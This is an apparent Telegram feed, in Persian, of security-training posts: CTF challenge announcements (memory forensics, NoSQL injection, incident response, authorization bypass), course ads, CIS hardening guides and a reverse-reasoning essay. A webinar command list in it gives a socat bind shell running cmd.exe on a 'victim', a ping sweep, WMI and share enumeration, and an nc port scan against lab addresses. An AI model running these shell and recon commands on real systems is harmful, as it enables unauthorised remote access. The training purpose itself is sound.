Forwarded from challenginno.ir
✔️ یک تحلیلگر امنیتی در حال بررسی نفوذ مشکوک به سیستم Windows 10 است. کاربران گزارش دادهاند که فعالیتهای غیرعادی مشاهده کردهاند، اما هیچ برنامهای به طور واضح در حال اجرا نیست.
✅ شما یک دقیقۀ طلایی (Golden Minute) برای بررسی فایل حافظه و شناسایی تهدید دارید. مهاجم از فایل مخرب استفاده کرده است تا به سیستم دسترسی بگیرد.
✅ وظیفه شما این است که حافظه سیستم را بررسی نموده، فرآیند مخرب را شناسایی کنید و روش ارتباط آن را کشف نمایید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/memory-forensic
✅ شما یک دقیقۀ طلایی (Golden Minute) برای بررسی فایل حافظه و شناسایی تهدید دارید. مهاجم از فایل مخرب استفاده کرده است تا به سیستم دسترسی بگیرد.
✅ وظیفه شما این است که حافظه سیستم را بررسی نموده، فرآیند مخرب را شناسایی کنید و روش ارتباط آن را کشف نمایید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/memory-forensic
PowerShell for Pentest-Final.pdf
2.7 MB
✅ پاورشل به عنوان یک ابزار قدرتمند در سیستمعامل ویندوز، نه تنها برای مدیریت و خودکارسازی وظایف مدیریتی استفاده میشود، بلکه مورد توجه متخصصان امنیت نیز قرار گرفته است.
📌 در این کتاب، به بررسی روشهای مختلف تست نفوذ با پاورشل خواهیم پرداخت. از شناسایی و جمعآوری اطلاعات گرفته تا بهرهبرداری و Post-Exploitation، تکنیکهایی معرفی خواهند شد که به کارشناسان امنیت کمک میکنند تا نقاط ضعف شبکهها و سیستمها را شناسایی کرده و برای بهبود امنیت اقدام کنند.
🔰 لازم به ذکر است که مستند پیش رو، ترجمه بخشهایی از کتاب PowerShell for Penetration Testing نوشته Dr. Andrew Blyth است.
📌 در این کتاب، به بررسی روشهای مختلف تست نفوذ با پاورشل خواهیم پرداخت. از شناسایی و جمعآوری اطلاعات گرفته تا بهرهبرداری و Post-Exploitation، تکنیکهایی معرفی خواهند شد که به کارشناسان امنیت کمک میکنند تا نقاط ضعف شبکهها و سیستمها را شناسایی کرده و برای بهبود امنیت اقدام کنند.
🔰 لازم به ذکر است که مستند پیش رو، ترجمه بخشهایی از کتاب PowerShell for Penetration Testing نوشته Dr. Andrew Blyth است.
Forwarded from challenginno.ir
challenginno.ir
red-blue-02.wmv
✔️ سلام و عرض ادب خدمت کلیه دوستان و همراهان گرامی
✅ در راستای اهداف پلتفرم Challenginno، دومین رویداد Red/Blue Time در 16 بهمن ماه به صورت وبیناری برگزار شد.
✅ فیلم وبینار هم اکنون در دسترس دوستان می باشد.
🔴 ممنون از همه دوستان گرامی که در این وبینار حضور داشتند منتظر اخبار بعدی ما باشید
🌐https://t.iss.one/RedTeamAPT
🌐 https://challenginno.ir
✅ در راستای اهداف پلتفرم Challenginno، دومین رویداد Red/Blue Time در 16 بهمن ماه به صورت وبیناری برگزار شد.
✅ فیلم وبینار هم اکنون در دسترس دوستان می باشد.
🔴 ممنون از همه دوستان گرامی که در این وبینار حضور داشتند منتظر اخبار بعدی ما باشید
🌐https://t.iss.one/RedTeamAPT
🌐 https://challenginno.ir
Forwarded from challenginno.ir
challenginno.ir
red-blue-02.wmv
🔴 لیست دستورات مربوط به وبینار دوم Red/Blue Time
`socat - TCP4:192.168.141.157:4447 ---- > on kali with victim ip
--------
`socat -d -d TCP4-LISTEN:4447 EXEC:'cmd.exe',pipes ----> on victim
-----------
for /L %i in (1,1,254) do @ping -n 1 -w 100 192.168.141.%i | find "TTL="
------------
tracert 192.168.141.138
Resolve-DnsName "192.168.141.138"
wmic /node:"192.168.141.138" os get
Get-WmiObject -Class Win32_Share -ComputerName "192.168.141.138"
-------
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
wmic product get name
-------------
C:\Users\OMID\AppData\Roaming\MobaXterm\slash\bin
C:\Users\OMID\AppData\Roaming\MobaXterm\slash\etc\sessionsaliases.sh
`nc -zv 192.168.1.1 80-100`
`pktmon start --capture --comp nics --file-name C:\capture.etl`
`pktmon stop`
`pktmon format C:\capture.etl -o C:\capture.txt`
Forwarded from challenginno.ir
✔️ آسیبپذیری SQL Injection یکی از رایجترین و خطرناکترین نقاط ضعف امنیتی در برنامههای تحت وب است. این آسیب پذیری زمانی رخ میدهد که ورودیهای کاربر بهدرستی اعتبارسنجی یا فیلتر نشوند و مستقیماً در کوئریهای SQL استفاده شوند.
✅ در این چالش سعی شده است که به آسیبپذیری NoSQL Injection پرداخته شده و دیتابیس MongoDB در آن مورد بررسی قرار داده شود.
✅ این جالش شامل دو مرحله اکسپلویت آسیبپذیری به منظور شناسایی فلگ اول و اتصال به دیتابیس جهت استخراج اطلاعات و شناسایی فلگ دوم است.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/no-sqli-njection
✅ در این چالش سعی شده است که به آسیبپذیری NoSQL Injection پرداخته شده و دیتابیس MongoDB در آن مورد بررسی قرار داده شود.
✅ این جالش شامل دو مرحله اکسپلویت آسیبپذیری به منظور شناسایی فلگ اول و اتصال به دیتابیس جهت استخراج اطلاعات و شناسایی فلگ دوم است.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/no-sqli-njection
Forwarded from challenginno.ir
✔️ یکی واحدهای مهم که وجود آن در امنیت بسیار حائز اهمیت است، واحد پاسخگویی به حادثه یا Incident Response است.
✅ تیم Incident Response پس از بررسی های اولیه بر روی یک سیستم، به این نتیجه می رسد که احتمالا فردی به این سیستم دسترسی گرفته و سیستم آلوده شده است. همچنین برخی از شواهد نشان دهنده دسترسی نفوذگر به اطلاعات داخلی شبکه است. بدین منظور، تیم پاسخگویی به حادثه تصمیم می گیرد تا ترافیک ایجاد شده در یک بازه زمانی را بررسی نماید.
✅ هم اکنون فایل pcap ترافیک در اختیار شما قرار دارد و شما می بایست با بررسی این فایل به سوالات مطرح شده در چالش پاسخ دهید.
🔴 برای مشاهده ششمین بخش از این مجموعه چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/incident-response-6
✅ تیم Incident Response پس از بررسی های اولیه بر روی یک سیستم، به این نتیجه می رسد که احتمالا فردی به این سیستم دسترسی گرفته و سیستم آلوده شده است. همچنین برخی از شواهد نشان دهنده دسترسی نفوذگر به اطلاعات داخلی شبکه است. بدین منظور، تیم پاسخگویی به حادثه تصمیم می گیرد تا ترافیک ایجاد شده در یک بازه زمانی را بررسی نماید.
✅ هم اکنون فایل pcap ترافیک در اختیار شما قرار دارد و شما می بایست با بررسی این فایل به سوالات مطرح شده در چالش پاسخ دهید.
🔴 برای مشاهده ششمین بخش از این مجموعه چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/incident-response-6
Forwarded from challenginno.ir
✔️ یک سازمان بزرگ متوجه شده است که یکی از سرورهای ویندوزی آن، علائم فعالیت مشکوک دارد.
✅ تیم امنیتی متوجه شده که برخی از حسابهای کاربری دارای فعالیت غیرعادی هستند، اما هیچ نشانهای از بدافزار یا ابزارهای شناختهشده نفوذ وجود ندارد.
✅ وظیفهی شما این است که ردپای مهاجم را پیدا کنید، نحوهی ورود او را کشف کنید، و اقدامات او را تحلیل کنید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/windows-forensic/
✅ تیم امنیتی متوجه شده که برخی از حسابهای کاربری دارای فعالیت غیرعادی هستند، اما هیچ نشانهای از بدافزار یا ابزارهای شناختهشده نفوذ وجود ندارد.
✅ وظیفهی شما این است که ردپای مهاجم را پیدا کنید، نحوهی ورود او را کشف کنید، و اقدامات او را تحلیل کنید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/windows-forensic/
Forwarded from challenginno.ir
✔️ یک شرکت امنیتی متوجه میشود که یکی از کارمندانش که دارای سطح دسترسی بالای هست، فایلهای حساس را از سیستم خود پاک کرده است.
✅ تیم امنیتی باید مشخص کند که آیا فایلهای حذف شده بازیابیپذیر هستند یا خیر، چه اطلاعاتی در متادیتا باقی مانده و آیا نشانهای از مخفیسازی اطلاعات با استفاده از Alternate Data Streams (ADS) یا دیگر تکنیکها وجود دارد.
✅ برای حل این چالش شما می بایست تمامی شواهد در MFT، ADS، Prefetch، Event Logs و تغییرات متادیتا را بررسی نمایید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/for500
✅ تیم امنیتی باید مشخص کند که آیا فایلهای حذف شده بازیابیپذیر هستند یا خیر، چه اطلاعاتی در متادیتا باقی مانده و آیا نشانهای از مخفیسازی اطلاعات با استفاده از Alternate Data Streams (ADS) یا دیگر تکنیکها وجود دارد.
✅ برای حل این چالش شما می بایست تمامی شواهد در MFT، ADS، Prefetch، Event Logs و تغییرات متادیتا را بررسی نمایید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/for500
Forwarded from TolueAcademy
پلتفرم شکار تهدید HELK – یک راهکار متنباز برای تحلیل امنیتی پیشرفته
--------------------------------------
Hunting ELK (HELK) یکی از اولین پلتفرمهای متنباز برای شکار تهدیدات است که دارای قابلیتهای تحلیل پیشرفتهای مانند SQL، گرافسازی، استریم دادههای ساختاریافته، و یادگیری ماشین از طریق Jupyter Notebooks و Apache Spark بر روی ELK Stack میباشد. این پروژه ابتدا برای تحقیقات امنیتی توسعه یافت، اما به دلیل طراحی انعطافپذیر و اجزای اصلی آن، قابلیت استقرار در محیطهای سازمانی بزرگ را نیز دارد.
ویژگیهای کلیدی HELK
🔹 تحلیل دادههای امنیتی پیشرفته
پشتیبانی از SQL برای اجرای کوئریهای پیشرفته
گرافسازی و تحلیل بصری دادههای امنیتی
پردازش استریمینگ دادهها برای تحلیل لحظهای
🔹 یکپارچهسازی یادگیری ماشین
قابلیت توسعه مدلهای تشخیص ناهنجاری
🔹 شکار تهدیدات و تحلیل امنیتی
طراحیشده برای شناسایی و بررسی رفتارهای مشکوک مهاجمان
پشتیبانی از قوانین Sigma، چارچوب MITRE ATT&CK و زبان EQL
امکان ساخت و تنظیم قوانین امنیتی سفارشی
کسب اطلاعات بیشتر:
https://github.com/Cyb3rWard0g/HELK
--------------------------------------
Hunting ELK (HELK) یکی از اولین پلتفرمهای متنباز برای شکار تهدیدات است که دارای قابلیتهای تحلیل پیشرفتهای مانند SQL، گرافسازی، استریم دادههای ساختاریافته، و یادگیری ماشین از طریق Jupyter Notebooks و Apache Spark بر روی ELK Stack میباشد. این پروژه ابتدا برای تحقیقات امنیتی توسعه یافت، اما به دلیل طراحی انعطافپذیر و اجزای اصلی آن، قابلیت استقرار در محیطهای سازمانی بزرگ را نیز دارد.
ویژگیهای کلیدی HELK
🔹 تحلیل دادههای امنیتی پیشرفته
پشتیبانی از SQL برای اجرای کوئریهای پیشرفته
گرافسازی و تحلیل بصری دادههای امنیتی
پردازش استریمینگ دادهها برای تحلیل لحظهای
🔹 یکپارچهسازی یادگیری ماشین
قابلیت توسعه مدلهای تشخیص ناهنجاری
🔹 شکار تهدیدات و تحلیل امنیتی
طراحیشده برای شناسایی و بررسی رفتارهای مشکوک مهاجمان
پشتیبانی از قوانین Sigma، چارچوب MITRE ATT&CK و زبان EQL
امکان ساخت و تنظیم قوانین امنیتی سفارشی
کسب اطلاعات بیشتر:
https://github.com/Cyb3rWard0g/HELK
Forwarded from challenginno.ir
✔️ قسمت Authorization Testing یکی از بخشهای کلیدی در OWASP Web Security Testing Guide یا WSTG است که به بررسی و ارزیابی مکانیزمهای تعیین سطوح دسترسی و Authorization در برنامههای وب میپردازد.
✅ آسیبپذیری Bypassing Authorization Schema زمانی رخ میدهد که یک مهاجم بتواند با دور زدن مکانیزمهای کنترل دسترسی، به منابع یا عملکردهایی که نباید در دسترس او باشند، دسترسی پیدا کند.
✅ در این چالش که در سه مرحله ایجاد شده است، در هر مرحله شما باید به پنل ادمین برنامه دسترسی پیدا نموده و فلگ را از آن استخراج نمایید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/bypassing-authorization-schema
✅ آسیبپذیری Bypassing Authorization Schema زمانی رخ میدهد که یک مهاجم بتواند با دور زدن مکانیزمهای کنترل دسترسی، به منابع یا عملکردهایی که نباید در دسترس او باشند، دسترسی پیدا کند.
✅ در این چالش که در سه مرحله ایجاد شده است، در هر مرحله شما باید به پنل ادمین برنامه دسترسی پیدا نموده و فلگ را از آن استخراج نمایید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/bypassing-authorization-schema
✔️ مستند امنسازی IIS 10 بر اساس چارچوب CIS شامل مجموعهای از توصیهها و پیکربندیهای امنیتی است که به سازمانها کمک میکند تا سرور Microsoft IIS 10 خود را در برابر تهدیدات سایبری محافظت کنند.
✅ این راهنما شامل تنظیمات امنیتی پیشنهادی برای سرور وب، مدیریت هویت و دسترسی، لاگینگ و نظارت، و کاهش سطح حمله است.
✅ این مستند به عنوان یک استاندارد امنیتی شناختهشده، به مدیران شبکه و امنیت امکان میدهد تا IIS 10 را مطابق با بهترین شیوههای امنیتی تنظیم و ایمنسازی کنند.
🔴 برای تهیه این مستند که به صورت فارسی ایجاد شده است لینک زیر مراجعه نمایید:
🌐 yun.ir/9otg6d
✅ این راهنما شامل تنظیمات امنیتی پیشنهادی برای سرور وب، مدیریت هویت و دسترسی، لاگینگ و نظارت، و کاهش سطح حمله است.
✅ این مستند به عنوان یک استاندارد امنیتی شناختهشده، به مدیران شبکه و امنیت امکان میدهد تا IIS 10 را مطابق با بهترین شیوههای امنیتی تنظیم و ایمنسازی کنند.
🔴 برای تهیه این مستند که به صورت فارسی ایجاد شده است لینک زیر مراجعه نمایید:
🌐 yun.ir/9otg6d
🧑💻 آموزش تست نفوذ را با ما تجربه کنید :
[+]تست نفوذ شبکه و وب را رایگان یاد بگیر .
[+]مهندسی اجتماعی را رایگان یاد بگیر .
[+]زبان C برای هکرها و فراتر از آن !
[+]ابزار نویسی با پایتون را رایگان یاد بگیر .
[+]مفاهیم پایه امنیت را با ما یاد بگیر .
[+]نکات و ابزار ها و کاربا ابزارهای امنیتی و مقاله های امنیت را در کانال ما دنبال کنید .
[+]پیش نیازهای ورود به دنیای تست نفوذ را با ما تجربه کنید .
[+]چگونه و از کجا هک را شروع کنیم ؟قبلاً فیلم هکرهایی را تماشا کرده اید؟
[+] پرینتر هکینگ
[+] اصول اولیه PowerShell و PowerShell Scripting را بیاموزید.
[+] مقدمه ای بر امنیت سایبری
[+] مینیدوره Linux command-line
[+] دوره Security plus
[+] دوره برنامه نویسی اسمبلی
🔖 و کلی مباحث و مفاهیم دیگر را با ما تجربه کنید .
⭕️ به دنیای آموزش رایگان تست نفوذ خوش اومدید .
♦️ linkedin | YouTube | Instagram |
💠 @TryHackBox
[+]تست نفوذ شبکه و وب را رایگان یاد بگیر .
[+]مهندسی اجتماعی را رایگان یاد بگیر .
[+]زبان C برای هکرها و فراتر از آن !
[+]ابزار نویسی با پایتون را رایگان یاد بگیر .
[+]مفاهیم پایه امنیت را با ما یاد بگیر .
[+]نکات و ابزار ها و کاربا ابزارهای امنیتی و مقاله های امنیت را در کانال ما دنبال کنید .
[+]پیش نیازهای ورود به دنیای تست نفوذ را با ما تجربه کنید .
[+]چگونه و از کجا هک را شروع کنیم ؟قبلاً فیلم هکرهایی را تماشا کرده اید؟
[+] پرینتر هکینگ
[+] اصول اولیه PowerShell و PowerShell Scripting را بیاموزید.
[+] مقدمه ای بر امنیت سایبری
[+] مینیدوره Linux command-line
[+] دوره Security plus
[+] دوره برنامه نویسی اسمبلی
🔖 و کلی مباحث و مفاهیم دیگر را با ما تجربه کنید .
⭕️ به دنیای آموزش رایگان تست نفوذ خوش اومدید .
♦️ linkedin | YouTube | Instagram |
💠 @TryHackBox
Forwarded from TolueAcademy
آکادمی طلوع برگزار میکند: سه دوره آموزشی تخصصی به صورت Crash Course! 🔴
---------------------------------
اگر به دنبال یادگیری مهارتهای کلیدی در امنیت سایبری، شبکه و تست نفوذ هستید، این فرصت را از دست ندهید! در این دورههای فشرده، مباحث کلیدی و کاربردی را در کمترین زمان ممکن یاد خواهید گرفت.
📌 دوره آموزشی Red Teaming – تکنیکهای پیشرفته نفوذ و شبیهسازی حملات واقعی برای دور زدن مکانیزمهای امنیتی
https://evnd.co/Nt3PK
🎯 ویژگیهای دورهها:
✅ تدریس توسط متخصصان با تجربه
✅ محتوای کاملاً عملی و کاربردی
✅ ارائه سناریوهای واقعی و تمرینات عملی
✅ امکان پرسش و پاسخ مستقیم با اساتید
💡 ظرفیت محدود است، ثبتنام کنید و مهارتهای خود را به سطح بالاتری ببرید!
📢 برای اطلاعات بیشتر، با ما در ارتباط باشید.
---------------------------------
اگر به دنبال یادگیری مهارتهای کلیدی در امنیت سایبری، شبکه و تست نفوذ هستید، این فرصت را از دست ندهید! در این دورههای فشرده، مباحث کلیدی و کاربردی را در کمترین زمان ممکن یاد خواهید گرفت.
📌 دوره آموزشی Red Teaming – تکنیکهای پیشرفته نفوذ و شبیهسازی حملات واقعی برای دور زدن مکانیزمهای امنیتی
https://evnd.co/Nt3PK
🎯 ویژگیهای دورهها:
✅ تدریس توسط متخصصان با تجربه
✅ محتوای کاملاً عملی و کاربردی
✅ ارائه سناریوهای واقعی و تمرینات عملی
✅ امکان پرسش و پاسخ مستقیم با اساتید
💡 ظرفیت محدود است، ثبتنام کنید و مهارتهای خود را به سطح بالاتری ببرید!
📢 برای اطلاعات بیشتر، با ما در ارتباط باشید.
Forwarded from TolueAcademy
آکادمی طلوع برگزار میکند: سه دوره آموزشی تخصصی به صورت Crash Course! 🔴
---------------------------------
اگر به دنبال یادگیری مهارتهای کلیدی در امنیت سایبری، شبکه و تست نفوذ هستید، این فرصت را از دست ندهید! در این دورههای فشرده، مباحث کلیدی و کاربردی را در کمترین زمان ممکن یاد خواهید گرفت.
📌 دوره آموزشی FortiGate & Splunk – تسلط بر مدیریت و تنظیمات فایروال FortiGate به همراه مانیتورینگ و تحلیل لاگها در Splunk
https://evnd.co/PDyNV
🎯 ویژگیهای دورهها:
✅ تدریس توسط متخصصان با تجربه
✅ محتوای کاملاً عملی و کاربردی
✅ ارائه سناریوهای واقعی و تمرینات عملی
✅ امکان پرسش و پاسخ مستقیم با اساتید
💡 ظرفیت محدود است، ثبتنام کنید و مهارتهای خود را به سطح بالاتری ببرید!
📢 برای اطلاعات بیشتر، با ما در ارتباط باشید.
TolueAcademy
---------------------------------
اگر به دنبال یادگیری مهارتهای کلیدی در امنیت سایبری، شبکه و تست نفوذ هستید، این فرصت را از دست ندهید! در این دورههای فشرده، مباحث کلیدی و کاربردی را در کمترین زمان ممکن یاد خواهید گرفت.
📌 دوره آموزشی FortiGate & Splunk – تسلط بر مدیریت و تنظیمات فایروال FortiGate به همراه مانیتورینگ و تحلیل لاگها در Splunk
https://evnd.co/PDyNV
🎯 ویژگیهای دورهها:
✅ تدریس توسط متخصصان با تجربه
✅ محتوای کاملاً عملی و کاربردی
✅ ارائه سناریوهای واقعی و تمرینات عملی
✅ امکان پرسش و پاسخ مستقیم با اساتید
💡 ظرفیت محدود است، ثبتنام کنید و مهارتهای خود را به سطح بالاتری ببرید!
📢 برای اطلاعات بیشتر، با ما در ارتباط باشید.
TolueAcademy
Forwarded from TolueAcademy
آکادمی طلوع برگزار میکند: سه دوره آموزشی تخصصی به صورت Crash Course! 🔴
---------------------------------
اگر به دنبال یادگیری مهارتهای کلیدی در امنیت سایبری، شبکه و تست نفوذ هستید، این فرصت را از دست ندهید! در این دورههای فشرده، مباحث کلیدی و کاربردی را در کمترین زمان ممکن یاد خواهید گرفت.
📌 دوره آموزشی FortiWeb – آشنایی کامل با فایروال برنامههای تحت وب و پیکربندی امنیتی آن
https://evnd.co/z1LJ7
🎯 ویژگیهای دورهها:
✅ تدریس توسط متخصصان با تجربه
✅ محتوای کاملاً عملی و کاربردی
✅ ارائه سناریوهای واقعی و تمرینات عملی
✅ امکان پرسش و پاسخ مستقیم با اساتید
💡 ظرفیت محدود است، ثبتنام کنید و مهارتهای خود را به سطح بالاتری ببرید!
📢 برای اطلاعات بیشتر، با ما در ارتباط باشید.
TolueAcademy
---------------------------------
اگر به دنبال یادگیری مهارتهای کلیدی در امنیت سایبری، شبکه و تست نفوذ هستید، این فرصت را از دست ندهید! در این دورههای فشرده، مباحث کلیدی و کاربردی را در کمترین زمان ممکن یاد خواهید گرفت.
📌 دوره آموزشی FortiWeb – آشنایی کامل با فایروال برنامههای تحت وب و پیکربندی امنیتی آن
https://evnd.co/z1LJ7
🎯 ویژگیهای دورهها:
✅ تدریس توسط متخصصان با تجربه
✅ محتوای کاملاً عملی و کاربردی
✅ ارائه سناریوهای واقعی و تمرینات عملی
✅ امکان پرسش و پاسخ مستقیم با اساتید
💡 ظرفیت محدود است، ثبتنام کنید و مهارتهای خود را به سطح بالاتری ببرید!
📢 برای اطلاعات بیشتر، با ما در ارتباط باشید.
TolueAcademy
✔️ مستند امنسازی SQL Server 2019 بر اساس چارچوب CIS شامل مجموعهای از راهنماییهای امنیتی استاندارد برای محافظت از پایگاه داده Microsoft SQL Server 2019 در برابر تهدیدات سایبری و سوءاستفادههای احتمالی است.
✅ این مستند تنظیمات پیشنهادی در حوزههای مدیریت هویت و دسترسی، کنترلهای احراز هویت، تنظیمات امنیتی دیتابیس، لاگینگ و نظارت، و کاهش سطح حمله را پوشش میدهد.
✅ این راهنما یک مرجع مهم برای مدیران پایگاه داده و متخصصان امنیت است تا SQL Server 2019 را مطابق با بهترین شیوههای امنیتی و استانداردهای جهانی پیکربندی کنند.
🔴 برای تهیه این مستند که به صورت فارسی ایجاد شده است لینک زیر مراجعه نمایید:
🌐 yun.ir/jx17a1
✅ این مستند تنظیمات پیشنهادی در حوزههای مدیریت هویت و دسترسی، کنترلهای احراز هویت، تنظیمات امنیتی دیتابیس، لاگینگ و نظارت، و کاهش سطح حمله را پوشش میدهد.
✅ این راهنما یک مرجع مهم برای مدیران پایگاه داده و متخصصان امنیت است تا SQL Server 2019 را مطابق با بهترین شیوههای امنیتی و استانداردهای جهانی پیکربندی کنند.
🔴 برای تهیه این مستند که به صورت فارسی ایجاد شده است لینک زیر مراجعه نمایید:
🌐 yun.ir/jx17a1
Forwarded from challenginno.ir
✔️ یکی از سوالاتی که همیشه در حوزه های مختلف امنیت سایبری به خصوص حوزه های Red Team و SOC مطرح بوده است، نحوه شروع به کار با فریمورک MITRE ATT&CK می باشد.
✅ فریمورک MITRE ATT&CK یک پایگاه دانش جهانی از تاکتیکها و تکنیکهای مهاجمان بر اساس مشاهدات واقعی است. این پایگاه دانش به عنوان بنیادی برای توسعه مدلها و متدولوژیهای تهدید در بخش خصوصی، دولت و جامعه محصولات و خدمات امنیت سایبری به کار میرود.
✅ در این چالش که به صورت پرسش و پاسخ طراحی شده است، سعی شده تا شما را در پاسخ به این سوال که چگونه استفاده از فریمورک MITRE ATT&CK را آغاز کنیم، راهنمایی کند.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/mitre-attack
✅ فریمورک MITRE ATT&CK یک پایگاه دانش جهانی از تاکتیکها و تکنیکهای مهاجمان بر اساس مشاهدات واقعی است. این پایگاه دانش به عنوان بنیادی برای توسعه مدلها و متدولوژیهای تهدید در بخش خصوصی، دولت و جامعه محصولات و خدمات امنیت سایبری به کار میرود.
✅ در این چالش که به صورت پرسش و پاسخ طراحی شده است، سعی شده تا شما را در پاسخ به این سوال که چگونه استفاده از فریمورک MITRE ATT&CK را آغاز کنیم، راهنمایی کند.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/mitre-attack
Getting Start with MITRE ATTaCK.pdf
2.3 MB
این کتاب با هدف آشنایی شما با MITRE ATT&CK، کاربردهای آن در تحلیل تهدیدات، شناسایی نقاط ضعف، تقویت استراتژیهای امنیتی و بهبود پاسخگویی به حملات نگارش شده است.
محتوای این کتاب توسط وب سایت MITRE تهیه شده و برگرفته از مقالات Katie Nickels، John Wunder، Blake Strom، Tim Schulz و Andy Applebaum میباشد و در آن به نحوه چگونگی شروع استفاده از فریمورک MITRE ATT&CK پرداخته شده است.
محتوای این کتاب توسط وب سایت MITRE تهیه شده و برگرفته از مقالات Katie Nickels، John Wunder، Blake Strom، Tim Schulz و Andy Applebaum میباشد و در آن به نحوه چگونگی شروع استفاده از فریمورک MITRE ATT&CK پرداخته شده است.
Forwarded from TolueAcademy
استدلال معکوس در امنیت سایبری – درسهایی از شرلوک هولمز
----------------------------------------------------------------------
"در حل یک مسئله از این نوع، مهمترین چیز توانایی استدلال معکوس است... بیشتر مردم، اگر یک روند وقایع را برایشان توضیح دهید، میتوانند نتیجهی نهایی را پیشبینی کنند. آنها میتوانند این وقایع را در ذهن خود کنار هم قرار دهند و نتیجه بگیرند که چه اتفاقی خواهد افتاد. اما افراد بسیار کمی هستند که اگر فقط نتیجه نهایی را بدانند، بتوانند مراحل و وقایعی را که به آن نتیجه منجر شده است، بازسازی کنند. این توانایی همان چیزی است که من هنگام صحبت از استدلال معکوس یا تحلیلگرایانه به آن اشاره میکنم."
— شرلوک هولمز
مفهوم این اصل در امنیت سایبری
در امنیت سایبری، بسیاری از ابزارها و کارشناسان میتوانند وقتی یک حمله یا رویداد مشکوک رخ میدهد، تأثیرات و پیامدهای آن را شناسایی کنند. اما تحلیلگران امنیتی خبره کسانی هستند که میتوانند از یک نشانه یا رویداد نهایی، مسیر وقوع حمله را بازسازی کنند و بفهمند که حمله از کجا آغاز شده و چه مراحلی طی شده است.
بهعبارت دیگر، متخصصان امنیتی باید همانند شرلوک هولمز، بهجای پیشبینی حملات، مسیر آنها را از آخر به اول بازسازی کنند. این کار به آنها کمک میکند تا نقاط ضعف را کشف کرده و از حملات مشابه در آینده جلوگیری کنند.
کاربردهای عملی استدلال معکوس در امنیت سایبری
✅ تحلیل حملات سایبری
فرض کنید یک سازمان متوجه میشود که دادههایش به بیرون درز کردهاند. روش کلاسیک تحلیل ممکن است روی بررسی تأثیرات حمله تمرکز کند، اما روش استدلال معکوس به ما کمک میکند تا بفهمیم:
• نقطه ورود مهاجم به شبکه کجا بوده است؟
• مهاجم از چه آسیبپذیریهایی استفاده کرده است؟
• چگونه به دادههای حساس دسترسی پیدا کرده و آنها را خارج کرده است؟
✅ پاسخ به رخدادهای امنیتی
پس از شناسایی یک نفوذ یا رفتار مشکوک، تیمهای امنیتی باید مسیر حرکت مهاجم را در شبکه به عقب دنبال کنند. این کار شامل بررسی لاگها، تغییرات در سیستمها، و رفتارهای غیرعادی کاربران است تا متوجه شوند که مهاجم چگونه توانسته به سیستم نفوذ کند.
✅ تحلیل جرایم سایبری و مهندسی معکوس بدافزارها
در جرایم سایبری، محققان امنیتی و تیمهای واکنش به رخدادها (CSIRT) باید از ردپاهای دیجیتالی استفاده کنند تا مراحل یک حمله را بازسازی کنند. همچنین، در مهندسی معکوس بدافزارها، تحلیلگران باید بفهمند که یک کد مخرب چگونه کار میکند و چه تغییراتی در سیستم ایجاد کرده است.
@TolueRise
----------------------------------------------------------------------
"در حل یک مسئله از این نوع، مهمترین چیز توانایی استدلال معکوس است... بیشتر مردم، اگر یک روند وقایع را برایشان توضیح دهید، میتوانند نتیجهی نهایی را پیشبینی کنند. آنها میتوانند این وقایع را در ذهن خود کنار هم قرار دهند و نتیجه بگیرند که چه اتفاقی خواهد افتاد. اما افراد بسیار کمی هستند که اگر فقط نتیجه نهایی را بدانند، بتوانند مراحل و وقایعی را که به آن نتیجه منجر شده است، بازسازی کنند. این توانایی همان چیزی است که من هنگام صحبت از استدلال معکوس یا تحلیلگرایانه به آن اشاره میکنم."
— شرلوک هولمز
مفهوم این اصل در امنیت سایبری
در امنیت سایبری، بسیاری از ابزارها و کارشناسان میتوانند وقتی یک حمله یا رویداد مشکوک رخ میدهد، تأثیرات و پیامدهای آن را شناسایی کنند. اما تحلیلگران امنیتی خبره کسانی هستند که میتوانند از یک نشانه یا رویداد نهایی، مسیر وقوع حمله را بازسازی کنند و بفهمند که حمله از کجا آغاز شده و چه مراحلی طی شده است.
بهعبارت دیگر، متخصصان امنیتی باید همانند شرلوک هولمز، بهجای پیشبینی حملات، مسیر آنها را از آخر به اول بازسازی کنند. این کار به آنها کمک میکند تا نقاط ضعف را کشف کرده و از حملات مشابه در آینده جلوگیری کنند.
کاربردهای عملی استدلال معکوس در امنیت سایبری
✅ تحلیل حملات سایبری
فرض کنید یک سازمان متوجه میشود که دادههایش به بیرون درز کردهاند. روش کلاسیک تحلیل ممکن است روی بررسی تأثیرات حمله تمرکز کند، اما روش استدلال معکوس به ما کمک میکند تا بفهمیم:
• نقطه ورود مهاجم به شبکه کجا بوده است؟
• مهاجم از چه آسیبپذیریهایی استفاده کرده است؟
• چگونه به دادههای حساس دسترسی پیدا کرده و آنها را خارج کرده است؟
✅ پاسخ به رخدادهای امنیتی
پس از شناسایی یک نفوذ یا رفتار مشکوک، تیمهای امنیتی باید مسیر حرکت مهاجم را در شبکه به عقب دنبال کنند. این کار شامل بررسی لاگها، تغییرات در سیستمها، و رفتارهای غیرعادی کاربران است تا متوجه شوند که مهاجم چگونه توانسته به سیستم نفوذ کند.
✅ تحلیل جرایم سایبری و مهندسی معکوس بدافزارها
